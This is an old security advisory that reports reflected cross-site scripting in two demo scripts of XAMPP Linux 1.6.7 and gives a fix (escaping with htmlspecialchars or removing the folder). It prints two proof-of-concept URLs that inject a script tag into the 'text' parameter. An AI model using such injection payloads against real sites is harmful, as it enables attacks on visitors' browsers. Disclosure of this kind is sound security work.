Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20301
HistoryAug 07, 2008 - 12:00 a.m.

Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities

2008-08-0700:00:00
vulners.com
25

Program : Xampp Linux 1.6.7

Type : Multiple Cross Site Scripting Vulnerabilities

Alert : Medium


Download From : http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar.gz


Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com


Cross Site Scripting Vulnerabilities :

Vulnerability work when register_globals set as on .

http://Example.com/xampp/iart.php?text=">><<>>"''<script>alert(document.alert)</script>

http://Example.com/xampp/ming.php?text=">><<>>"''<script>alert(document.alert)</script>

Solution : Remove xampp folder or filter text variable with htmlspecialchars() function …


                    Tnx : God

                 HTTP://IRCRASH.COM